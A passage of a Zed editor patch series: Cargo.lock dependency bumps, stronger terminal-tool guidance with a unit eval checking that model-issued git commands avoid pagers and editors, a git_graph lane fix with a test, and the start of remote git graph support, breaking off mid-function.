[ [[package]] name = "wasmtime-internal-component-util" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6bc24aba0bfd3d39fa8f0012835bc4d4efc75b1350b5e519181319eb8bb306b2" +checksum = "7f54018baf62f4e9c616c31f2aeadcf0c202ff691a390ad53e291ae7160b169e" [[package]] name = "wasmtime-internal-cranelift" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "54eb7fc20c8692dc96148365d7a00a1b79fee810833c75bdf8ec073a46e4721a" +checksum = 
"5a2412f2afb0a5db2a4ac1cfff73247e240aeaa90bf41497ad0a5084b6a24eca" dependencies = [ "anyhow", "cfg-if", @@ -20093,9 +20093,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-fiber" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "30708e122dcc1e175c66345c209c01752ca0cd20c9021721b6f56968342e9dbe" +checksum = "ecfdc460dd5d343d88ff1ffaf65ae019feeb6124ddcfd3f39d28331068d25b1f" dependencies = [ "anyhow", "cc", @@ -20109,9 +20109,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-jit-debug" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1eeaab071a646d9ae205266adf186c63fa6d077d36b0b33628dd6c3d321d3195" +checksum = "b5abb428a71827b7f90fc64406749883ccc6e58addf6d36974d5e06942011707" dependencies = [ "cc", "wasmtime-internal-versioned-export-macros", @@ -20119,9 +20119,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-jit-icache-coherence" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "09979561e6e4a17bf55722463b066ccb968f010ac6ec5d647e4dff19eddbb19e" +checksum = "ba6cc13f14c3fb83fb877cb1d5c605e93f7ec1bf7fc1a5e8b361209d2f8ca028" dependencies = [ "anyhow", "cfg-if", @@ -20131,24 +20131,24 @@ dependencies = [ [[package]] name = "wasmtime-internal-math" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9193eb852e5c68aeb95a5ea7538c2bec503023169a0b24430224b4f1ded24988" +checksum = "1cb209473a09f4dbd9c87bb9f18b8dcb0c9da30d12a260e3eacf7a1a53b41480" dependencies = [ "libm", ] [[package]] name = "wasmtime-internal-slab" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "289bfa4fbb43f406f36166737f1f25522c215ef2ef11f98423089a6a7590a3d1" +checksum = "aab4df5a04752106e1ecef9d40145ef28fa033b0d5dd3c839c9b208b2d522183" 
[[package]] name = "wasmtime-internal-unwinder" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4e748c970993865d9bf474465c3f10f96e541c472bc8f7ec0b031779f4ac29c6" +checksum = "5359875d29bddb6f7e65e698157714d8d35ebd8ea2a92893d05d6b062147b639" dependencies = [ "anyhow", "cfg-if", @@ -20159,9 +20159,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-versioned-export-macros" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e97e07438cb8b50df3bc9659c56757830a15235c94268dbbd54186524fd4ed84" +checksum = "2e247bcdd69701743ba386c933b26ebad2ce912ff9cb68b5b71fdb29d39ba04a" dependencies = [ "proc-macro2", "quote", @@ -20170,9 +20170,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-winch" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "107aa0c3f71cc590c786d6d6e09893558b383f4d78107b864a9fd978929d0244" +checksum = "d0298dfd9f57588222b5a92dcffe75894f1ead4e519850f176bde7fcfd105d54" dependencies = [ "anyhow", "cranelift-codegen", @@ -20187,9 +20187,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-wit-bindgen" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eeb3d8e4efdaae10aa01264e9946bba507e53707125dd0aa8584b5e13229a3c0" +checksum = "1706803e83b9bae726a0f55e7c1bbf78a7421cf2da68c940c70978e91dfc0339" dependencies = [ "anyhow", "bitflags 2.10.0", @@ -20200,9 +20200,9 @@ dependencies = [ [[package]] name = "wasmtime-wasi" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "86fffc455304d2750ea2456394cdf6513d8771eb5b256876685b8bb9413bfb0e" +checksum = "1a430602ec54d0e32fbb61d2d8c7e5885eaa9dbc1664b6ed57fb57df439810a0" dependencies = [ "anyhow", "async-trait", @@ -20231,9 +20231,9 @@ dependencies = [ [[package]] name = 
"wasmtime-wasi-io" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5666a220e8318309225b54a55b270e1b506385adcce10bf5698380441afa0df3" +checksum = "8b2ba5dd68962de394cf15c7fb185f138cdd685ced631a7ed8e056de3e071029" dependencies = [ "anyhow", "async-trait", @@ -20698,9 +20698,9 @@ dependencies = [ [[package]] name = "wiggle" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4e176546937d1311c7608276c8511d3ea9b8e7b916e89b720e12c4d4bbae067c" +checksum = "1979d3ed3ffc017538e518da6faa66b129f9229492981fc51004f28cb86db792" dependencies = [ "anyhow", "async-trait", @@ -20713,9 +20713,9 @@ dependencies = [ [[package]] name = "wiggle-generate" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e3f012ad76133d9ac70633c7f954e289fb4c21986059f324fec3c476664ab643" +checksum = "25d92ae7a084d8543aa7ccef0fac52c86481a7278d0533f7fdeaf89bd7b7e29f" dependencies = [ "anyhow", "heck 0.5.0", @@ -20727,9 +20727,9 @@ dependencies = [ [[package]] name = "wiggle-macro" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4301e6203d3d13eef139fa3aca5f04e9156b4a5f7636ca965b2c10bce410b3d2" +checksum = "36a1b1b93fd9ce569bb40c1eadf5c56533cebfc04ba545c8bc1e74464cff0735" dependencies = [ "proc-macro2", "quote", @@ -20759,7 +20759,7 @@ version = "0.1.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" dependencies = [ - "windows-sys 0.48.0", + "windows-sys 0.61.2", ] [[package]] @@ -20770,9 +20770,9 @@ checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" [[package]] name = "winch-codegen" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = 
"646e2d01f59d7006e24a370762abfb63d5918696ff02197e027efd15252a1f79" +checksum = "2e2d7ea2137be52644d9c42ca5a4899bba07c2ed2db1e66c4c1994adfe35d39e" dependencies = [ "anyhow", "cranelift-assembler-x64", From 2e254857bc7adbd628cf40895a9b30f379c31943 Mon Sep 17 00:00:00 2001 From: Richard Feldman Date: Tue, 5 May 2026 15:51:55 -0400 Subject: [PATCH 210/231] Strengthen guidance for git commands in the terminal tool (#55787) Move guidance about pty-blocking commands from the `TerminalToolInput` struct-level doc comment to the `command` field's doc comment so it's surfaced more prominently to the model in the tool's JSON schema, and call out `--no-pager` and `GIT_EDITOR=true` explicitly for git operations. In practice, the previous wording about `git --no-pager diff` was easy for agents to overlook, leading to terminal calls that block waiting on `less` (for `git log`/`git diff`/`git show`) or on an interactive editor (for `git rebase`/`git commit`/`git merge`). Unit eval change before/after wording change: image Closes AI-154 Release Notes: - Zed Agent's terminal tool now much more consistently uses `--no-pager` and `GIT_EDITOR` with `git` commands --- crates/agent/src/tools/evals.rs | 2 + crates/agent/src/tools/evals/terminal_tool.rs | 528 ++++++++++++++++++ crates/agent/src/tools/terminal_tool.rs | 9 +- 3 files changed, 537 insertions(+), 2 deletions(-) create mode 100644 crates/agent/src/tools/evals/terminal_tool.rs diff --git a/crates/agent/src/tools/evals.rs b/crates/agent/src/tools/evals.rs index b5d9f47ea5def0..a2e09b3f8aa9ed 100644 --- a/crates/agent/src/tools/evals.rs +++ b/crates/agent/src/tools/evals.rs @@ -1,2 +1,4 @@ #[cfg(all(test, feature = "unit-eval"))] mod edit_file; +#[cfg(all(test, feature = "unit-eval"))] +mod terminal_tool; diff --git a/crates/agent/src/tools/evals/terminal_tool.rs b/crates/agent/src/tools/evals/terminal_tool.rs new file mode 100644 index 00000000000000..3769df5abed0bc --- /dev/null +++ b/crates/agent/src/tools/evals/terminal_tool.rs 
@@ -0,0 +1,528 @@ +use crate::{AgentTool, Template, Templates, TerminalTool, TerminalToolInput}; +use Role::*; +use anyhow::{Context as _, Result}; +use client::{Client, RefreshLlmTokenListener, UserStore}; +use futures::StreamExt; +use gpui::{AppContext as _, AsyncApp, TestAppContext}; +use http_client::StatusCode; +use language_model::{ + LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, + LanguageModelRegistry, LanguageModelRequest, LanguageModelRequestMessage, MessageContent, Role, + SelectedModel, +}; +use prompt_store::{ProjectContext, WorktreeContext}; +use rand::prelude::*; +use reqwest_client::ReqwestClient; +use settings::SettingsStore; +use std::{ + fmt::{self, Display}, + path::Path, + str::FromStr, + sync::Arc, + time::Duration, +}; + +#[derive(Clone)] +struct EvalInput { + conversation: Vec, + assertion: CommandAssertion, +} + +impl EvalInput { + fn new(conversation: Vec, assertion: CommandAssertion) -> Self { + Self { + conversation, + assertion, + } + } +} + +#[derive(Clone, Debug, Eq, PartialEq, Hash)] +struct EvalAssertionOutcome { + score: usize, + message: Option, +} + +type AssertionFn = Arc EvalAssertionOutcome + Send + Sync + 'static>; + +#[derive(Clone)] +struct CommandAssertion { + description: &'static str, + check: AssertionFn, +} + +impl CommandAssertion { + fn new( + description: &'static str, + check: impl Fn(&TerminalToolInput) -> EvalAssertionOutcome + Send + Sync + 'static, + ) -> Self { + Self { + description, + check: Arc::new(check), + } + } + + /// Passes when the command is a git command and every git subcommand that + /// could block on a pty (pager or editor) is guarded with the appropriate + /// environment variable or flag. + /// + /// This is intentionally permissive about *which* git subcommand the model + /// chooses — for an indirect prompt like "combine my last 3 commits", the + /// model is free to first investigate with `git log` or jump straight to + /// `git rebase -i`. 
Either is fine, as long as whatever it picks won't + /// hang on a pager or editor. + fn git_pty_safe(description: &'static str) -> Self { + Self::new(description, |input| { + let cmd = input.command.as_str(); + let words: Vec<&str> = cmd.split_whitespace().collect(); + + if !words.contains(&"git") { + return EvalAssertionOutcome { + score: 0, + message: Some(format!("Expected a `git` command, got: {cmd}")), + }; + } + + // Subcommands that pipe their output through a pager by default, + // and so will hang on `less` unless one of these escape hatches is + // present somewhere in the command: + const PAGER_SUBCMDS: &[&str] = &["log", "diff", "show", "blame"]; + const PAGER_GUARDS: &[&str] = &["--no-pager", "GIT_PAGER=cat", "PAGER=cat"]; + + // Subcommands that may invoke an interactive editor and so will + // hang unless one of these escape hatches is present: + const EDITOR_SUBCMDS: &[&str] = &["rebase", "commit", "merge", "tag"]; + const EDITOR_GUARDS: &[&str] = + &["GIT_EDITOR=true", "GIT_EDITOR=:", "EDITOR=true", "EDITOR=:"]; + + let has_pager_guard = PAGER_GUARDS.iter().any(|guard| cmd.contains(guard)); + let has_editor_guard = EDITOR_GUARDS.iter().any(|guard| cmd.contains(guard)); + + for subcmd in PAGER_SUBCMDS { + if words.contains(subcmd) && !has_pager_guard { + return EvalAssertionOutcome { + score: 0, + message: Some(format!( + "`git {subcmd}` is missing a pager guard \ + (one of {PAGER_GUARDS:?}). Command: {cmd}" + )), + }; + } + } + + for subcmd in EDITOR_SUBCMDS { + if words.contains(subcmd) && !has_editor_guard { + return EvalAssertionOutcome { + score: 0, + message: Some(format!( + "`git {subcmd}` is missing an editor guard \ + (one of {EDITOR_GUARDS:?}). 
Command: {cmd}" + )), + }; + } + } + + EvalAssertionOutcome { + score: 100, + message: None, + } + }) + } +} + +struct EvalOutput { + tool_input: TerminalToolInput, + assertion: EvalAssertionOutcome, + assertion_description: &'static str, +} + +impl Display for EvalOutput { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + writeln!(f, "Score: {}", self.assertion.score)?; + writeln!(f, "Assertion: {}", self.assertion_description)?; + if let Some(message) = self.assertion.message.as_ref() { + writeln!(f, "Message: {}", message)?; + } + writeln!(f, "Tool input: {:#?}", self.tool_input)?; + Ok(()) + } +} + +struct TerminalToolTest { + model: Arc, + model_thinking_effort: Option, +} + +impl TerminalToolTest { + async fn new(cx: &mut TestAppContext) -> Self { + cx.executor().allow_parking(); + + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + + gpui_tokio::init(cx); + let http_client = Arc::new(ReqwestClient::user_agent("agent tests").unwrap()); + cx.set_http_client(http_client); + let client = Client::production(cx); + let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); + language_models::init(user_store, client, cx); + }); + + let agent_model = SelectedModel::from_str( + &std::env::var("ZED_AGENT_MODEL") + .unwrap_or("anthropic/claude-sonnet-4-6-latest".into()), + ) + .unwrap(); + + let authenticate_provider_tasks = cx.update(|cx| { + LanguageModelRegistry::global(cx).update(cx, |registry, cx| { + registry + .providers() + .iter() + .map(|p| p.authenticate(cx)) + .collect::>() + }) + }); + + let model = cx + .update(|cx| { + cx.spawn(async move |cx| { + futures::future::join_all(authenticate_provider_tasks).await; + load_model(&agent_model, cx).await.unwrap() + }) + }) + .await; + + let model_thinking_effort = model + .default_effort_level() + .map(|effort_level| 
effort_level.value.to_string()); + + Self { + model, + model_thinking_effort, + } + } + + async fn eval(&self, mut eval: EvalInput, cx: &mut TestAppContext) -> Result { + eval.conversation + .last_mut() + .context("Conversation must not be empty")? + .cache = true; + + let tools = crate::built_in_tools().collect::>(); + + let system_prompt = { + let worktrees = vec![WorktreeContext { + root_name: "root".to_string(), + abs_path: Path::new("/path/to/root").into(), + rules_file: None, + }]; + let project_context = ProjectContext::new(worktrees, Vec::default()); + let tool_names = tools + .iter() + .map(|tool| tool.name.clone().into()) + .collect::>(); + let template = crate::SystemPromptTemplate { + project: &project_context, + available_tools: tool_names, + model_name: None, + }; + template.render(&Templates::new())? + }; + + let has_system_prompt = eval + .conversation + .first() + .is_some_and(|msg| msg.role == Role::System); + let messages = if has_system_prompt { + eval.conversation + } else { + [LanguageModelRequestMessage { + role: Role::System, + content: vec![MessageContent::Text(system_prompt)], + cache: true, + reasoning_details: None, + }] + .into_iter() + .chain(eval.conversation) + .collect::>() + }; + + let request = LanguageModelRequest { + messages, + tools, + thinking_allowed: true, + thinking_effort: self.model_thinking_effort.clone(), + ..Default::default() + }; + + let tool_input = + retry_on_rate_limit(async || extract_tool_use(&self.model, request.clone(), cx).await) + .await?; + + let assertion = (eval.assertion.check)(&tool_input); + Ok(EvalOutput { + tool_input, + assertion, + assertion_description: eval.assertion.description, + }) + } +} + +async fn load_model( + selected_model: &SelectedModel, + cx: &mut AsyncApp, +) -> Result> { + cx.update(|cx| { + let registry = LanguageModelRegistry::read_global(cx); + let provider = registry + .provider(&selected_model.provider) + .expect("Provider not found"); + provider.authenticate(cx) + }) + 
.await?; + Ok(cx.update(|cx| { + let models = LanguageModelRegistry::read_global(cx); + models + .available_models(cx) + .find(|model| { + model.provider_id() == selected_model.provider && model.id() == selected_model.model + }) + .unwrap_or_else(|| panic!("Model {} not found", selected_model.model.0)) + })) +} + +/// Stream the model completion and extract the first complete tool use whose +/// name matches `TerminalTool::NAME`, parsed as `TerminalToolInput`. +async fn extract_tool_use( + model: &Arc, + request: LanguageModelRequest, + cx: &mut TestAppContext, +) -> Result { + let model = model.clone(); + let events = cx + .update(|cx| { + let async_cx = cx.to_async(); + cx.foreground_executor() + .spawn(async move { model.stream_completion(request, &async_cx).await }) + }) + .await + .map_err(|err| anyhow::anyhow!("completion error: {}", err))?; + + let mut streamed_text = String::new(); + let mut stop_reason = None; + let mut parse_errors = Vec::new(); + + let mut events = events.fuse(); + while let Some(event) = events.next().await { + match event { + Ok(LanguageModelCompletionEvent::ToolUse(tool_use)) + if tool_use.is_input_complete && tool_use.name.as_ref() == TerminalTool::NAME => + { + let input: TerminalToolInput = serde_json::from_value(tool_use.input) + .context("Failed to parse tool input as TerminalToolInput")?; + return Ok(input); + } + Ok(LanguageModelCompletionEvent::Text(text)) => { + if streamed_text.len() < 2_000 { + streamed_text.push_str(&text); + } + } + Ok(LanguageModelCompletionEvent::Stop(reason)) => { + stop_reason = Some(reason); + } + Ok(LanguageModelCompletionEvent::ToolUseJsonParseError { + tool_name, + raw_input, + json_parse_error, + .. 
+ }) if tool_name.as_ref() == TerminalTool::NAME => { + parse_errors.push(format!("{json_parse_error}\nRaw input:\n{raw_input:?}")); + } + Err(err) => { + return Err(anyhow::anyhow!("completion error: {}", err)); + } + _ => {} + } + } + + let streamed_text = streamed_text.trim(); + let streamed_text_suffix = if streamed_text.is_empty() { + String::new() + } else { + format!("\nStreamed text:\n{streamed_text}") + }; + let stop_reason_suffix = stop_reason + .map(|reason| format!("\nStop reason: {reason:?}")) + .unwrap_or_default(); + let parse_errors_suffix = if parse_errors.is_empty() { + String::new() + } else { + format!("\nTool parse errors:\n{}", parse_errors.join("\n")) + }; + + anyhow::bail!( + "Stream ended without a terminal tool use{stop_reason_suffix}{parse_errors_suffix}{streamed_text_suffix}" + ) +} + +async fn retry_on_rate_limit(mut request: impl AsyncFnMut() -> Result) -> Result { + const MAX_RETRIES: usize = 20; + let mut attempt = 0; + + loop { + attempt += 1; + let response = request().await; + + if attempt >= MAX_RETRIES { + return response; + } + + let retry_delay = match &response { + Ok(_) => None, + Err(err) => match err.downcast_ref::() { + Some(err) => match &err { + LanguageModelCompletionError::RateLimitExceeded { retry_after, .. } + | LanguageModelCompletionError::ServerOverloaded { retry_after, .. } => { + Some(retry_after.unwrap_or(Duration::from_secs(5))) + } + LanguageModelCompletionError::UpstreamProviderError { + status, + retry_after, + .. + } => { + let should_retry = matches!( + *status, + StatusCode::TOO_MANY_REQUESTS | StatusCode::SERVICE_UNAVAILABLE + ) || status.as_u16() == 529; + + if should_retry { + Some(retry_after.unwrap_or(Duration::from_secs(5))) + } else { + None + } + } + LanguageModelCompletionError::ApiReadResponseError { .. } + | LanguageModelCompletionError::ApiInternalServerError { .. } + | LanguageModelCompletionError::HttpSend { .. 
} => { + Some(Duration::from_secs(2_u64.pow((attempt - 1) as u32).min(30))) + } + _ => None, + }, + _ => None, + }, + }; + + if let Some(retry_after) = retry_delay { + let jitter = retry_after.mul_f64(rand::rng().random_range(0.0..1.0)); + eprintln!("Attempt #{attempt}: Retry after {retry_after:?} + jitter of {jitter:?}"); + #[allow(clippy::disallowed_methods)] + async_io::Timer::after(retry_after + jitter).await; + } else { + return response; + } + } +} + +fn run_eval(eval: EvalInput) -> eval_utils::EvalOutput<()> { + let dispatcher = gpui::TestDispatcher::new(rand::random()); + let mut cx = TestAppContext::build(dispatcher, None); + let foreground_executor = cx.foreground_executor().clone(); + let result = foreground_executor.block_test(async { + let test = TerminalToolTest::new(&mut cx).await; + let result = test.eval(eval, &mut cx).await; + drop(test); + cx.run_until_parked(); + result + }); + cx.quit(); + match result { + Ok(output) => eval_utils::EvalOutput { + data: output.to_string(), + outcome: if output.assertion.score < 80 { + eval_utils::OutcomeKind::Failed + } else { + eval_utils::OutcomeKind::Passed + }, + metadata: (), + }, + Err(err) => eval_utils::EvalOutput { + data: format!("{err:?}"), + outcome: eval_utils::OutcomeKind::Error, + metadata: (), + }, + } +} + +fn message( + role: Role, + contents: impl IntoIterator, +) -> LanguageModelRequestMessage { + LanguageModelRequestMessage { + role, + content: contents.into_iter().collect(), + cache: false, + reasoning_details: None, + } +} + +fn text(text: impl Into) -> MessageContent { + MessageContent::Text(text.into()) +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_git_log_uses_no_pager() { + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![message( + User, + [text(indoc::indoc! {" + Use the terminal tool to show me the most recent 3 commits + on the current branch (subject lines only is fine). 
+ "})], + )], + CommandAssertion::git_pty_safe( + "`git log`-style prompt produces a pty-safe git command", + ), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_git_rebase_sets_git_editor() { + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![message( + User, + [text(indoc::indoc! {" + Use the terminal tool to rebase the current branch onto + `origin/main`. + "})], + )], + CommandAssertion::git_pty_safe("`git rebase` prompt produces a pty-safe git command"), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_git_rebase_implied_sets_git_editor() { + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![message( + User, + [text(indoc::indoc! {" + My branch has 3 small commits that I'd like to combine + into a single clean commit before merging. Help me do + that with the terminal tool. + "})], + )], + CommandAssertion::git_pty_safe("indirect prompt produces a pty-safe git command"), + )) + }); +} diff --git a/crates/agent/src/tools/terminal_tool.rs b/crates/agent/src/tools/terminal_tool.rs index 34d19c581a40da..4f0c6b48c80af6 100644 --- a/crates/agent/src/tools/terminal_tool.rs +++ b/crates/agent/src/tools/terminal_tool.rs @@ -34,11 +34,16 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024; /// /// Remember that each invocation of this tool will spawn a new shell process, so you can't rely on any state from previous invocations. /// -/// The terminal emulator is an interactive pty, so commands may block waiting for user input. -/// Some commands can be configured not to do this, such as `git --no-pager diff` and similar. +/// The terminal is an interactive pty, so any command that blocks waiting for input will hang the tool until it times out. 
To avoid this: +/// +/// - Always insert `--no-pager` immediately after `git` for any read-only git command, including `git log`, `git diff`, `git show`, `git blame`, and `git stash show`. Example: `git --no-pager log -n 5` (NOT `git log -n 5`). +/// - Always prepend `GIT_EDITOR=true ` to any git command that may invoke an editor, including `git rebase`, `git commit`, `git merge`, and `git tag`. Example: `GIT_EDITOR=true git rebase origin/main` (NOT `git rebase origin/main`). +/// - For other commands that may open a pager or editor, set `PAGER=cat` and/or `EDITOR=true` similarly. #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] pub struct TerminalToolInput { /// The one-liner command to execute. Do not include shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`; resolve those values first or ask the user. + /// + /// REMINDER: read-only git commands (`git log`, `git diff`, `git show`, `git blame`) MUST include `--no-pager` (e.g. `git --no-pager log`). Git commands that may open an editor (`git rebase`, `git commit`, `git merge`, `git tag`) MUST be prefixed with `GIT_EDITOR=true ` (e.g. `GIT_EDITOR=true git rebase origin/main`). Otherwise the terminal will hang. pub command: String, /// Working directory for the command. This must be one of the root directories of the project. pub cd: String, From c54f5f3c301cb77a7b3a19ddd99bc542c5820440 Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Tue, 5 May 2026 17:07:52 -0400 Subject: [PATCH 211/231] git_graph: Keep shared parents on the leftmost incoming lane (#55818) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Fixes git graph lane selection when multiple active lanes point to the same parent commit, matching Git’s `--graph` behavior by keeping the commit on the leftmost incoming lane instead of the first discovered lane. 
This should make it much easier to track long lived branches ### Before image ### After Screenshot 2026-05-05 at 4 07 28 PM Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --------- Co-authored-by: Remco Smits --- crates/git_graph/src/git_graph.rs | 72 ++++++++++++++++++++++++++++++- 1 file changed, 71 insertions(+), 1 deletion(-) diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index 73ad9293e17318..ac9a01deb9fb4a 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -640,7 +640,7 @@ impl GraphData { let commit_lane = self .parent_to_lanes .get(&commit.sha) - .and_then(|lanes| lanes.first().copied()); + .and_then(|lanes| lanes.iter().min().copied()); let commit_lane = commit_lane.unwrap_or_else(|| self.first_empty_lane_idx()); @@ -4049,6 +4049,74 @@ mod tests { Ok(()) } + fn verify_keep_shared_parents_on_leftmost_lane(graph: &GraphData) -> Result<()> { + let mut active_lane_parents: Vec> = Vec::new(); + let mut parent_to_lanes: HashMap> = HashMap::default(); + + for (row, entry) in graph.commits.iter().enumerate() { + let pending_lanes = parent_to_lanes.remove(&entry.data.sha).unwrap_or_default(); + + if pending_lanes.len() > 1 + && let Some(expected_lane) = pending_lanes.iter().copied().min() + && entry.lane != expected_lane + { + bail!( + "commit {:?} at row {} uses lane {}, but shared parent should use leftmost pending lane {} from {:?}", + entry.data.sha, + row, + entry.lane, + expected_lane, + pending_lanes + ); + } + + for lane in pending_lanes { + let Some(active_lane_parent) = active_lane_parents.get_mut(lane) else { + bail!( + 
"commit {:?} at row {} was pending on missing lane {}", + entry.data.sha, + row, + lane + ); + }; + + if *active_lane_parent != Some(entry.data.sha) { + bail!( + "commit {:?} at row {} was pending on lane {}, but that lane points to {:?}", + entry.data.sha, + row, + lane, + active_lane_parent + ); + } + + *active_lane_parent = None; + } + + for (parent_index, parent) in entry.data.parents.iter().enumerate() { + let lane = if parent_index == 0 { + entry.lane + } else if let Some(empty_lane) = + active_lane_parents.iter().position(Option::is_none) + { + empty_lane + } else { + active_lane_parents.push(None); + active_lane_parents.len() - 1 + }; + + if lane >= active_lane_parents.len() { + active_lane_parents.resize(lane + 1, None); + } + + active_lane_parents[lane] = Some(*parent); + parent_to_lanes.entry(*parent).or_default().push(lane); + } + } + + Ok(()) + } + fn verify_coverage(graph: &GraphData) -> Result<()> { let mut expected_edges: HashSet<(Oid, Oid)> = HashSet::default(); for entry in &graph.commits { @@ -4197,6 +4265,8 @@ mod tests { verify_column_correctness(graph, &oid_to_row).context("column correctness")?; verify_segment_continuity(graph).context("segment continuity")?; verify_merge_line_optimality(graph, &oid_to_row).context("merge line optimality")?; + verify_keep_shared_parents_on_leftmost_lane(graph) + .context("keep shared parents on leftmost lane")?; verify_coverage(graph).context("coverage")?; verify_line_overlaps(graph).context("line overlaps")?; Ok(()) From 6552f418a0b154b56cc81df2ce2eab5683c271f9 Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Tue, 5 May 2026 17:44:06 -0400 Subject: [PATCH 212/231] git_graph: Add remote support (#55788) Follow up: https://github.com/zed-industries/zed/pull/55167, https://github.com/zed-industries/zed/pull/54468 This is the final PR for adding remote support on the git graph. 
It uses the client stream request support added in #55167 to add support for the initial graph data request. I also fixed a bug where `GitGraph::FullyLoaded` repository event was never emitted. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes ##53040 Co-authored-by: Remco Smits \ Release Notes: - git_graph: Add remote support --------- Co-authored-by: Ben Kunkle --- crates/project/src/git_store.rs | 364 +++++++++++++++++++++++++++----- crates/proto/proto/git.proto | 24 +++ crates/proto/proto/zed.proto | 4 +- crates/proto/src/proto.rs | 4 + 4 files changed, 337 insertions(+), 59 deletions(-) diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 20facc32640bf9..d5c6565b6ccd80 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -361,6 +361,7 @@ pub struct InitialGitGraphData { pub error: Option, pub commit_data: Vec>, pub commit_oid_to_index: HashMap, + subscribers: Vec>, SharedString>>>, } pub struct GraphDataResponse<'a> { @@ -680,6 +681,7 @@ impl GitStore { client.add_entity_request_handler(Self::handle_edit_ref); client.add_entity_request_handler(Self::handle_repair_worktrees); client.add_entity_request_handler(Self::handle_get_commit_data); + client.add_entity_stream_request_handler(Self::handle_get_initial_graph_data); client.add_entity_stream_request_handler(Self::handle_search_commits); } @@ -2670,6 +2672,105 @@ impl GitStore { Ok(proto::GetCommitDataResponse { commits }) } + async fn handle_get_initial_graph_data( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result>> { + const CHUNK_SIZE: usize = 
